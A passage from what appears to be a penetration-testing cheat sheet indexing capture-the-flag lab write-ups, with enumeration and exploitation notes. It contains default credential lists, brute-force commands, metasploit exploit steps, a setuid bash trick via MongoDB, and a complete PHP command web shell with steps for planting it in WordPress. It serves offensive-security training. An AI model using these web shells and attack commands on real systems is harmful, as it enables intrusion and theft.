[`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 20. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | | 21. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | | 22. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100"/> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | | 23. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100"/> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | | 24. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | | 25. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100"/> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 26. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 27. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/ratings.png" width="59" height="20"/> | [htb#1](https://app.hackthebox.eu/machines/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100"/> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) | | 28. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 29. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/ratings.png" width="59" height="20"/> | [htb#2](https://app.hackthebox.eu/machines/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100"/> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) | | 30. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 31. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 32. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/ratings.png" width="59" height="20"/> | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100"/> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 33. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100"/> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | | 34. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100"/> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) | | 35. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100"/> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 36. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100"/> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 37. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/ratings.png" width="59" height="20"/> | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100"/> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | | 38. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/ratings.png" width="59" height="20"/> | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100"/> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 39. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | <a name="ttps"></a> ## ☢️ TTPs [↟](#contents) <a name="enumerate"></a> ### ⚙️ Enumerate [🡑](#ttps) <a name="enumerate_app_apache"></a> #### enumerate_app_apache [⇡](#enumerate) ```shell use directory traversal to checkout the config file: /usr/local/etc/apache22/httpd.conf /etc/apache2/sites-enabled/000-default.conf useful when certain config changes block enumeration ``` --- <a name="enumerate_app_apache_tomcat"></a> #### enumerate_app_apache_tomcat [⇡](#enumerate) ```shell tomcat manager default creds: tomcat:tomcat admin:admin admin:password user:password tomcat:s3cret ``` [+] https://0xrick.github.io/hack-the-box/jerry/ --- <a name="enumerate_app_coldfusion_files"></a> #### enumerate_app_coldfusion_files [⇡](#enumerate) look for available sub directories and files on a coldfusion install ```shell dirb http://<targetip>:<targetport> /usr/share/dirb/wordlists/vulns/coldfusion.txt ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 --- <a name="enumerate_app_coldfusion_version"></a> #### enumerate_app_coldfusion_version [⇡](#enumerate) find out the coldfusion install version ```shell http://<targetip>:<targetport>/CFIDE/adminapi/base.cfc?wsdl ``` [+] http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf (pg42) --- <a name="enumerate_app_drupal"></a> #### enumerate_app_drupal [⇡](#enumerate) ```shell version: http://<targetip>:<targetport>/CHANGELOG.txt bruteforce: ipaddr="<targetip>"; id=$(curl -s http://$ipaddr/user/ | grep "form_build_id" | cut -d"\"" -f6); hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V scan: /opt/droopescan/droopescan scan drupal -u http://<targetip> ``` [+] https://zayotic.com/posts/oscp-reference/ --- <a name="enumerate_app_joomla"></a> #### enumerate_app_joomla [⇡](#enumerate) ```shell joomscan --url http://<targetip> ``` [+] https://zayotic.com/posts/oscp-reference/ --- <a name="enumerate_app_mongo"></a> #### enumerate_app_mongo [⇡](#enumerate) ```shell mongo -p -u mark scheduler => connects to mongodb as user mark and allows interaction with db scheduler use scheduler => switch db db.getCollectionNames() => list all collections/tables db.tasks.find({}) => show all entries from collection/table db.tasks.insert({"cmd": "cp /bin/bash /tmp/bash; chmod u+s /tmp/bash;"}) => insert a new entry within table tasks ``` --- <a name="enumerate_app_nodejs"></a> #### enumerate_app_nodejs [⇡](#enumerate) ```shell check source and look at the js files to find interesting links/apis use burp to spider and create a sitemap of the website find app.js and look for db credentials (sql/mongo) try ssh using db credentials ``` --- <a name="enumerate_app_pfsense"></a> #### enumerate_app_pfsense [⇡](#enumerate) ```shell default credentials: admin/pfsense ``` --- <a name="enumerate_app_phpmyadmin"></a> #### enumerate_app_phpmyadmin [⇡](#enumerate) ```shell default credentials: admin/ admin/admin root/root root/password root/mysql ``` --- <a name="enumerate_app_powershell_history"></a> #### enumerate_app_powershell_history [⇡](#enumerate) For certain accounts (like `sql_svc`) that are both user and service accounts, we can look at the user's PowerShell history and find interesting information. ```shell type C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_app_prtg"></a> #### enumerate_app_prtg [⇡](#enumerate) ```shell default credentials: prtgadmin/prtgadmin configuration and backup files (accessed via an open ftp/smb): c:\programdata\paessler\Configuration.dat c:\programdata\paessler\Configuration.old ``` --- <a name="enumerate_app_unrealirc"></a> #### enumerate_app_unrealirc [⇡](#enumerate) ```shell msfconsole use exploit/unix/irc/unreal_ircd_3281_backdoor set rhost <targetip> set rport <targetport> exploit ``` [+] https://snowscan.io/htb-writeup-irked/ --- <a name="enumerate_app_webmin"></a> #### enumerate_app_webmin [⇡](#enumerate) ```shell view any file - even root owned, run perl cgi scripts msf: auxiliary/admin/webmin/file_disclosure can view /etc/ldap.secret file that might give credentials can be used to run a perl cgi script (uploaded via some other means) to gain root reverse shell download shadow file and try cracking hashes download ssh authorized_keys for users (names obtained from shadow file), use edb:5720 and "ssh -i" ``` --- <a name="enumerate_app_wordpress"></a> #### enumerate_app_wordpress [⇡](#enumerate) ```shell default creds: admin/password look for phpmyadmin, plugins directories look for wp-config.php file (via an open smb/ftp share) => contains db creds, useful for phpmyadmin and ssh enumerate authors: http://192.168.92.167:<targetport>/?author=1 => will show username as "AUTHOR ARCHIVES: <username>" http://192.168.92.167:<targetport>/?author=2 => will not show username if author id is invalid wpuser http://192.168.92.134/ usernames wpscan --url http://192.168.92.134:80/ -e vp,vt,tt,cb,dbe,u,m bruteforce wordpress login: wpscan --url http://192.168.92.134 -P fsocity.dic.trimmed -U elliot wpscan --url http://192.168.92.169/backup_wordpress/ -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -U admin,john wpscan --disable-tls-checks --url https://192.168.92.165:12380/blogblog/ -P $HOME/toolbox/vulnhub/mrrobot1/pass.list -U elliot hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.92.169 http-post-form "/backup_wordpress/wp-login.php:log=admin&pwd=^PASS^:ERROR" wordpress to shell: #1 add webshell via /wp-admin/theme-editor.php?file=404.php a. "Appearance" -> "Editor" b. select "404 Template" (404.php) c. add php backdoor before the `<?php get_footer(); ?>` line and click "Update File" d. example php backdoor: /usr/share/webshells/php/php-reverse-shell.php e. run local netcat listener f. visit a non-existing page: http://192.168.92.191/wordpress/?p=<attackerport>99 #2 add webshell @ /wp-admin/ a. "Appearance" -> "Editor" b. select "Theme Footer" (footer.php) c. add php backdoor at the end of file and click "Update File" d. example php backdoor: <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); exec($cmd, $results); foreach( $results as $r ) { echo $r."<br/>"; } echo "</pre>"; die; } ?> /*Usage: http://domain/path?cmd=cat+/etc/passwd*/ e. visit http://192.168.92.169/backup_wordpress/?cmd=cat%20/etc/passwd to run commands f. result will be concatenated to the end of the page #3 add webshell via media file @ /wp-admin/plugin-install.php a. "Upload plugin" -> "Browse" b. example php backdoor: <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); exec($cmd, $results); foreach( $results as $r ) { echo $r."<br/>"; } echo "</pre>"; die; } ?> /*Usage: http://domain/path?cmd=cat+/etc/passwd*/ c. plugin install might fail, but php file will be uploaded as a media file d. visit http://192.168.92.169/backup_wordpress/wp-admin/upload.php to confirm file upload e. use http://192.168.92.169/backup_wordpress/wp-content/uploads/<year>/<monthid>/<filename>.php?cmd=cat%20/etc/passwd to run commands #4 metasploit: msf> use exploit/unix/webapp/wp_admin_shell_upload msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.92.169 msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /backup-wordpress msf exploit(unix/webapp/wp_admin_shell_upload) > set username john msf exploit(unix/webapp/wp_admin_shell_upload) > set password enigma msf exploit(unix/webapp/wp_admin_shell_upload) > exploit extract hashes from wp mysql db and crack via john: select concat_ws(':', user_login, user_pass) from wp_users; john --wordlist=/usr/share/wordlists/rockyou.txt hashes.wp ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 4. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_file_modified_time_window"></a> #### enumerate_file_modified_time_window [⇡](#enumerate) find files modified within a time window ```shell find / -newermt 2020-12-27 ! -newermt 2020-12-30 -type f 2>/def/null ``` [+] https://www.tripwire.com/state-of-security/security-data-protection/passing-offensive-security-certified-professional-exam-oscp/ --- <a name="enumerate_nmap_initial"></a> #### enumerate_nmap_initial [⇡](#enumerate) run nmap initial scans ```shell sudo nmap -Pn -sC -sV -O -oN initial <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_nmap_tcp"></a> #### enumerate_nmap_tcp [⇡](#enumerate) run nmap full tcp scans ```shell nmap -Pn -sC -sV -p- --min-rate 10000 -oN tcp <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_nmap_udp"></a> #### enumerate_nmap_udp [⇡](#enumerate) run nmap full udp scans ```shell nmap -Pn -sU -p- -oN udp <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_proto_distcc"></a> #### enumerate_proto_distcc [⇡](#enumerate) ```shell msf: exploit/unix/misc/distcc_exec ``` --- <a name="enumerate_proto_dns"></a> #### enumerate_proto_dns [⇡](#enumerate) ```shell reverse lookup to find all hostnames associated with an ip: dig +noall +answer -x <ipaddress> @<dnsserver> dns enumeration: dnsenum -o outputfile -f /usr/share/dnsrecon/namelist.txt -o outputfile domain bruteforce: nmap -p 80 --script dns-brute.nse <domain.name> python dnscan.py -d <domain.name> -w ./subdomains-10000.txt zone transfer: dig axfr @<dnsserver> <domain.name> host -t axfr <domain.name> <dnsserver> host -l <domain.name> <dnsserver> ``` --- <a name="enumerate_proto_finger"></a> #### enumerate_proto_finger [⇡](#enumerate) ```shell finger username@<targetip> ``` --- <a name="enumerate_proto_ftp"></a> #### enumerate_proto_ftp [⇡](#enumerate) check if version is vulnerable and exploit is available. check if anonymous access is enabled. check if read permission for sensitive files. check if write permission within webroot/uploads or other critical directories. check if ftp root directory is also http root directory and upload php reverse shell. remember - binary and ascii transfer mode switch ```shell ftp passive mode: ftp -p 192.168.92.192 bruteforce ftp login: use auxiliary/scanner/ftp/ftp_login misc: nmap --script=*ftp* --script-args=unsafe=1 -p 20,21 <targetip> nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <targetip> hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f <targetip> ftp ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | [+] https://medium.com/@ranakhalil101/my-oscp-journey-a-review-fa779b4339d9 --- <a name="enumerate_proto_http"></a> #### enumerate_proto_http [⇡](#enumerate) identify web server, technology, application. identify versions. run nikto, dirb/dirbuster, gobuster scans. look at robots.txt. look at source code. check for default creds, lfi/rfi, sqli, wordpress ```shell bash /usr/share/sparta/scripts/x11screenshot.sh <targetip> cewl http://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage cewl https://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage curl -i <targetip> ## check http response headers gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<taregtip>/ -t 20 -U 